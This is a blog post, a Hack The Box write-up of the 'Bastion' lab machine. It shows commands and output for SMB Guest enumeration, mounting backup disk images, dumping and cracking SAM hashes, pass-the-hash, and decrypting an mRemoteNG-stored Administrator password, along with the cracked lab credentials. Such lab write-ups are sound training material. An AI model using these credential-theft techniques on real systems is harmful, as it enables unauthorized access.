<!DOCTYPE html>
<html lang="en">

  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta name="author" content="Joe Graham">
    <meta name="description" content="Joe Graham&#39;s website and blog">
    <meta name="keywords" content="blog,cybersecurity,infosec,pentest,offsec">

    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Hack The Box Write-up: Bastion"/>
<meta name="twitter:description" content="A write-up of the exploit process for the Bastion box on HTB."/>

    <meta property="og:title" content="Hack The Box Write-up: Bastion" />
<meta property="og:description" content="A write-up of the exploit process for the Bastion box on HTB." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://joegraham.co/posts/bastion/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2019-08-05T17:31:48-04:00" />
<meta property="article:modified_time" content="2019-08-05T17:31:48-04:00" />



    
      <base href="https://joegraham.co/posts/bastion/">
    
    <title>
  Hack The Box Write-up: Bastion · Joe Graham
</title>

    
      <link rel="canonical" href="https://joegraham.co/posts/bastion/">
    

    <link href="https://fonts.googleapis.com/css?family=Lato:400,700%7CMerriweather:300,700%7CSource+Code+Pro:400,700" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.1/css/all.css" integrity="sha384-50oBUHEmvpQ+1lW4y57PTFmhCaXp0ML5d60M1M7uH2+nqUivzIebhndOJK28anvf" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.min.css" integrity="sha256-l85OmPOjvil/SOvVt3HnSSjzF1TUMyT9eV0c2BzEGzU=" crossorigin="anonymous" />

    
      
      
      <link rel="stylesheet" href="https://joegraham.co/css/coder.min.28d751104f30c16da1aa1bb04015cbe662cacfe0d1b01af4f2240ad58580069c.css" integrity="sha256-KNdREE8wwW2hqhuwQBXL5mLKz&#43;DRsBr08iQK1YWABpw=" crossorigin="anonymous" media="screen" />
    

    

    

    
      <link rel="stylesheet" href="https://joegraham.co/lightbox/lightbox.css" />
    

    
    
    <link rel="icon" type="image/png" href="https://joegraham.co/images/favicon-32x32.png" sizes="32x32">
    <link rel="icon" type="image/png" href="https://joegraham.co/images/favicon-16x16.png" sizes="16x16">

    <meta name="generator" content="Hugo 0.92.0" />
  </head>

  <body class=" ">
    <main class="wrapper">
      <nav class="navigation">
  <section class="container">
    <a class="navigation-title" href="https://joegraham.co/">
      Joe Graham
    </a>
    <input type="checkbox" id="menu-toggle" />
    <label class="menu-button float-right" for="menu-toggle"><i class="fas fa-bars"></i></label>
    <ul class="navigation-list">
      
        
          <li class="navigation-item">
            <a class="navigation-link" href="https://joegraham.co/posts/">Blog</a>
          </li>
        
          <li class="navigation-item">
            <a class="navigation-link" href="https://joegraham.co/about">About</a>
          </li>
        
      
      
    </ul>
  </section>
</nav>


      <div class="content">
        
  <section class="container post">
    <article>
      <header>
        <div class="post-title">
          <h1 class="title">Hack The Box Write-up: Bastion</h1>
        </div>
        <div class="post-meta">
          <div class="date">
            <span class="posted-on">
              <i class="fas fa-calendar"></i>
              <time datetime='2019-08-05T17:31:48-04:00'>
                August 5, 2019
              </time>
            </span>
            <span class="reading-time">
              <i class="fas fa-clock"></i>
              10 minutes read
            </span>
          </div>
          
          <div class="tags">
  <i class="fas fa-tag"></i>
    <a href="https://joegraham.co/tags/hack-the-box/">Hack the Box</a>
      <span class="separator">•</span>
    <a href="https://joegraham.co/tags/pentesting/">pentesting</a></div>

        </div>
      </header>

      <div>
        <p>This is my first in a series of write-ups on systems I&rsquo;ve successfully exploited on HackTheBox.
Bastion is a Windows host that at the time of writing has been rated fairly easy by other hackers,
which was my experience as well. However, this system was still a fun system to exploit with a novel
way of getting user access.</p>
<h1 id="enumeration">Enumeration</h1>
<p>First things first, let&rsquo;s nmap the box to see what services the box has running.</p>
<pre tabindex="0"><code>root@kali:bastion# nmap -p- -sV 10.10.10.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-05 20:49 EDT
Nmap scan report for 10.10.10.134
Host is up (0.060s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.64 seconds
</code></pre><p>One of the first things that stands out to me is that this host has OpenSSH listening on port 22.
<a href="https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview">Microsoft</a>
recently integrated OpenSSH into Windows, but this is the first time I&rsquo;ve seen it running as a service
on a Windows host in the wild. We can&rsquo;t do anything with SSH right now, but this does indicate that this
host is a Windows 10 or Windows Server 2016 or 2019 box, since OpenSSH is only available on this flavor of
Windows. We will come back to this service later on in the write-up.</p>
<h1 id="smb">SMB</h1>
<p>Other than SSH and WinRM, the only other listening useful service is SMB. For SMB, I usually use a mix
of enum4linux and smbmap to try to enumerate information about listening shares and the level of access
provided by the server. First, I tried enumerating access using an anonymous logon, which would be rare
on such a modern version of Windows, but is still worth a shot.</p>
<pre tabindex="0"><code>root@kali:smb# enum4linux 10.10.10.134
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Aug  5 20:58:24 2019

--snip--
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
</code></pre><p>Unfortunately, anonymous access didn&rsquo;t get us anything. It has, thankfully, gotten progressively more
difficult to set up anonymous SMB shares in Windows over the years, so this is pretty realistic.
One other thing I like to try to enumerate access is by using the built-in Guest account with no
password. Let&rsquo;s give that a shot.</p>
<pre tabindex="0"><code>root@kali:smb# enum4linux -u Guest 10.10.10.134
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Aug  5 21:01:33 2019

--snip--
 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.134    |
 ==================================================== 
[E] Can't find workgroup/domain


 ===================================== 
|    Session Check on 10.10.10.134    |
 ===================================== 
Use of uninitialized value  in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.10.134 allows sessions using username 'Guest', password ''
Use of uninitialized value  in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 =========================================== 
|    Getting domain SID for 10.10.10.134    |
 =========================================== 
Use of uninitialized value  in concatenation (.) or string at ./enum4linux.pl line 359.
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
[+] Can't determine if host is part of domain or part of a workgroup
enum4linux complete on Mon Aug  5 21:01:44 2019
</code></pre><p>It looks like the server allows connections as Guest! Running enum4linux with the <code>-a</code> parameter
only listed what shares the Guest user is able to access, and nothing else helpful.</p>
<pre tabindex="0"><code>root@kali:smb# enum4linux -a -u Guest 10.10.10.134
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Aug  5 21:03:25 2019

--snip--

 ========================================= 
|    Share Enumeration on 10.10.10.134    |
 ========================================= 
Use of uninitialized value  in concatenation (.) or string at ./enum4linux.pl line 640.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
Failed to connect with SMB1 -- no workgroup available

--snip--
</code></pre><p>I didn&rsquo;t expect to be able to access the default administrative shares (ADMIN$, C$, and IPC$), and
attempting to connect using smbclient confirmed that. However, the Backups share seems interesting
to us. Let&rsquo;s see what&rsquo;s inside that share.</p>
<pre tabindex="0"><code>root@kali:smb# smbclient -U Guest //10.10.10.134/Backups
Enter WORKGROUP\Guest's password: 
Try &quot;help&quot; to get a list of possible commands.
smb: \&gt; ls
  .                                   D        0  Mon Aug  5 21:09:35 2019
  ..                                  D        0  Mon Aug  5 21:09:35 2019
  ASwYWuILip                          D        0  Mon Aug  5 20:51:59 2019
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  oTWBZwpEdv                          D        0  Mon Aug  5 20:51:50 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  tmp                                 A      116  Mon Aug  5 21:09:35 2019
  WindowsImageBackup                  D        0  Fri Feb 22 07:44:02 2019

		7735807 blocks of size 4096. 2788438 blocks available
</code></pre><p>This confirms what the name of the share suggests: this share is used for backups by other systems
in this scenario. The other folders and files are artifacts of various SMB scanners verifying
read/write access on the share, which are left behind because the Guest user can only read and create
files on the share, not delete them. <code>note.txt</code> contains the following text: <code>Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.</code>
I believe this is a hint to help transfer files that we find later on. Looking further into the
WindowsImageBackup folder, there appears to be a single backup for the <code>L4mpje-PC</code> system performed
on February 22, 2019. L4mpje is the name of the creator of this box, so we&rsquo;re on the right track.
Listing the contents of the directory for this backup reveals two large files, as well as some other metadata:</p>
<pre tabindex="0"><code>smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\&gt; ls
  .                                   D        0  Fri Feb 22 07:45:32 2019
  ..                                  D        0  Fri Feb 22 07:45:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd      A 37761024  Fri Feb 22 07:44:03 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd      A 5418299392  Fri Feb 22 07:45:32 2019
  BackupSpecs.xml                     A     1186  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml      A     1078  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml      A     8930  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml      A     6542  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml      A     2894  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml      A     1488  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml      A     1484  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml      A     3844  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml      A     3988  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml      A     7110  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml      A  2374620  Fri Feb 22 07:45:32 2019

		7735807 blocks of size 4096. 2788327 blocks available
</code></pre><p>The two vhd&rsquo;s at the top are very attractive targets, but the size of the download caused timeouts that
caused the download to fail at first. Using the <code>timeout</code> command and setting the value to a
much bigger timeout allows these files to be downloaded.</p>
<h1 id="disk-image-forensics">Disk image forensics</h1>
<p>I had trouble mounting the first disk image,
but it turns out the second disk image was the more important one anyway, as it has the Windows
filesystem on it.</p>
<pre tabindex="0"><code>root@kali:smb# guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/disk1
root@kali:smb# cd /mnt/disk1
root@kali:disk1# ls
$Recycle.Bin autoexec.bat config.sys Documents and Settings pagefile.sys PerfLogs ProgramData Program Files Recovery System Volume Information Users Windows
</code></pre><p>Looking around the filesystem, it appears to be a very basic install of Windows with no other programs
installed and the user L4mpje as a local administrator. We can extract the hashes for users from the
registry using the pwdump tool. This tool uses the SECURITY and SAM hives of the registry and outputs
the user information and hashes in a format that looks like <code>/etc/shadow</code> on Linux systems, which
is what John The Ripper expects.</p>
<pre tabindex="0"><code>root@kali:disk1# cd Windows/System32/config
root@kali:config# pwdump SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
</code></pre><p>Using pth-smbclient, we verify that the hash extracted from the SAM database matches the hash on
Bastion.</p>
<pre tabindex="0"><code>root@kali:bastion# pth-smbclient -U L4mpje%aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 //10.10.10.134/Backups
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Try &quot;help&quot; to get a list of possible commands.
smb: \&gt; ls 
  .                                   D        0  Mon Aug  5 21:09:35 2019
  ..                                  D        0  Mon Aug  5 21:09:35 2019
  ASwYWuILip                          D        0  Mon Aug  5 20:51:59 2019
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  oTWBZwpEdv                          D        0  Mon Aug  5 20:51:50 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  tmp                                 A      116  Mon Aug  5 21:09:35 2019
  WindowsImageBackup                  D        0  Fri Feb 22 07:44:02 2019

		7735807 blocks of size 4096. 2788438 blocks available
</code></pre><p>I exported the hash information to a file and passed that to John The Ripper using the rockyou.txt
wordlist, and was able to recover the password for the L4mpje user.</p>
<pre tabindex="0"><code>root@kali:bastion# john hashes --show --format=nt
Administrator::500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:bureaulampje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

3 password hashes cracked, 0 left
</code></pre><h1 id="user-own">User own</h1>
<p>We are able to SSH into the host using the recovered L4mpje password, getting us a nice cmd.exe shell
over SSH.</p>
<pre tabindex="0"><code>root@kali:bastion# ssh L4mpje@10.10.10.134
L4mpje@10.10.10.134's password:
[screen clear]
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje&gt;
</code></pre><p>Looking around the system, we see there&rsquo;s a couple more programs installed on this box than L4mpje-PC.</p>
<pre tabindex="0"><code>l4mpje@BASTION C:\Users\L4mpje&gt;cd ..\..
l4mpje@BASTION C:\&gt;cd &quot;Program Files (x86)&quot;
l4mpje@BASTION C:\Program Files (x86)&gt;dir
 Volume in drive C has no label.                      
 Volume Serial Number is 0CB3-C487
 
 Directory of C:\Program Files (x86)

22-02-2019  15:01    &lt;DIR&gt;          .                       
22-02-2019  15:01    &lt;DIR&gt;          ..                       
16-07-2016  15:23    &lt;DIR&gt;          Common Files                       
23-02-2019  10:38    &lt;DIR&gt;          Internet Explorer                       
16-07-2016  15:23    &lt;DIR&gt;          Microsoft.NET                       
22-02-2019  15:01    &lt;DIR&gt;          mRemoteNG                       
23-02-2019  11:22    &lt;DIR&gt;          Windows Defender                       
23-02-2019  10:38    &lt;DIR&gt;          Windows Mail                       
23-02-2019  11:22    &lt;DIR&gt;          Windows Media Player                       
16-07-2016  15:23    &lt;DIR&gt;          Windows Multimedia Platform                       
16-07-2016  15:23    &lt;DIR&gt;          Windows NT                       
23-02-2019  11:22    &lt;DIR&gt;          Windows Photo Viewer                       
16-07-2016  15:23    &lt;DIR&gt;          Windows Portable Devices                       
16-07-2016  15:23    &lt;DIR&gt;          WindowsPowerShell                       
               0 File(s)              0 bytes                       
              14 Dir(s)  11.418.263.552 bytes free
</code></pre><p><a href="https://github.com/mRemoteNG/mRemoteNG">mRemoteNG</a> is an open source remote connections manager,
similar to RoyalTS or RDCMan. You configure connections with credentials in mRemoteNG, and simplify
connections to remote hosts. We can find the configuration data for mRemoteNG under the AppData folder
in L4mpje&rsquo;s user directory.</p>
<pre tabindex="0"><code>l4mpje@BASTION C:\Program Files (x86)&gt; cd ..\Users\L4mpje\AppData\Roaming\mRemoteNG
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG&gt;dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG

22-02-2019  15:03    &lt;DIR&gt;          .
22-02-2019  15:03    &lt;DIR&gt;          ..
22-02-2019  15:03             6.316 confCons.xml
22-02-2019  15:02             6.194 confCons.xml.20190222-1402277353.backup
22-02-2019  15:02             6.206 confCons.xml.20190222-1402339071.backup
22-02-2019  15:02             6.218 confCons.xml.20190222-1402379227.backup
22-02-2019  15:02             6.231 confCons.xml.20190222-1403070644.backup
22-02-2019  15:03             6.319 confCons.xml.20190222-1403100488.backup
22-02-2019  15:03             6.318 confCons.xml.20190222-1403220026.backup
22-02-2019  15:03             6.315 confCons.xml.20190222-1403261268.backup
22-02-2019  15:03             6.316 confCons.xml.20190222-1403272831.backup
22-02-2019  15:03             6.315 confCons.xml.20190222-1403433299.backup
22-02-2019  15:03             6.316 confCons.xml.20190222-1403486580.backup
22-02-2019  15:03                51 extApps.xml
22-02-2019  15:03             5.217 mRemoteNG.log
22-02-2019  15:03             2.245 pnlLayout.xml
22-02-2019  15:01    &lt;DIR&gt;          Themes
              14 File(s)         76.577 bytes
               3 Dir(s)  11.417.452.544 bytes free
</code></pre><h1 id="administrator-own">Administrator own</h1>
<p>Because this is a functional openSSH server, we can exfiltrate files using SCP just like on a Linux host.</p>
<pre tabindex="0"><code>root@kali:bastion# scp L4mpje@10.10.10.134:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml ./
L4mpje@10.10.10.134's password: 
confCons.xml                               100% 6316   110.0KB/s   00:00
root@kali:bastion# cat confCons.xml
&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;mrng:Connections xmlns:mrng=&quot;http://mremoteng.org&quot; Name=&quot;Connections&quot; Export=&quot;false&quot; 
EncryptionEngine=&quot;AES&quot; BlockCipherMode=&quot;GCM&quot; KdfIterations=&quot;1000&quot; FullFileEncryption=&quot;false&quot; 
Protected=&quot;ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA&quot; 
ConfVersion=&quot;2.6&quot;&gt;
    &lt;Node Name=&quot;DC&quot; Type=&quot;Connection&quot; Descr=&quot;&quot; Icon=&quot;mRemoteNG&quot; Panel=&quot;General&quot; 
	Id=&quot;500e7d58-662a-44d4-aff0-3a4f547a3fee&quot; Username=&quot;Administrator&quot; Domain=&quot;&quot; 
	Password=&quot;aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==&quot; 
	Hostname=&quot;127.0.0.1&quot; Protocol=&quot;RDP&quot; PuttySession=&quot;Default Settings&quot; Port=&quot;3389&quot; 
	ConnectToConsole=&quot;false&quot; UseCredSsp=&quot;true&quot; RenderingEngine=&quot;IE&quot; ICAEncryptionStrength=&quot;EncrBasic&quot; 
	RDPAuthenticationLevel=&quot;NoAuth&quot; RDPMinutesToIdleTimeout=&quot;0&quot; RDPAlertIdleTimeout=&quot;false&quot; 
	--snip-- /&gt;
    --snip--
&lt;/mrng:Connections&gt;
</code></pre><p>The config file contains information about an RDP connection locally as Administrator, including a
base64 encoded encrypted blob as the password. A quick Internet search reveals that there is
a simple <a href="https://github.com/haseebT/mRemoteNG-Decrypt">Python script</a> available on GitHub to decrypt
the password.</p>
<pre tabindex="0"><code>root@kali:bastion# python mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
</code></pre><p>Now that we have the Administrator password, we can SSH into the host with Administrative privileges,
root owning this box.</p>
<pre tabindex="0"><code>root@kali:bastion# ssh Administrator@10.10.10.134
Administrator@10.10.10.134's password
[screen clear]
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator&gt;
</code></pre><h1 id="summary">Summary</h1>
<p>This box was a pretty simple box overall but with some fun puzzles, like figuring out how to deal with
exfiltrating large files over SMB, and decrypting the password used by mRemoteNG. SMB is usually
thought about from a pentesting perspective as a service that, if vulnerable, can be used to easily
own a box as SYSTEM. This box was a great exercise in using SMB the way it was intended to exfiltrate
information.</p>

      </div>

      <footer>
        


        
        
      </footer>
    </article>

    
  </section>

      </div>

      <footer class="footer">
  <section class="container">
    
     © 2022
    
       · 
      Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
    
    
  </section>
</footer>

    </main>

    

  </body>

</html>
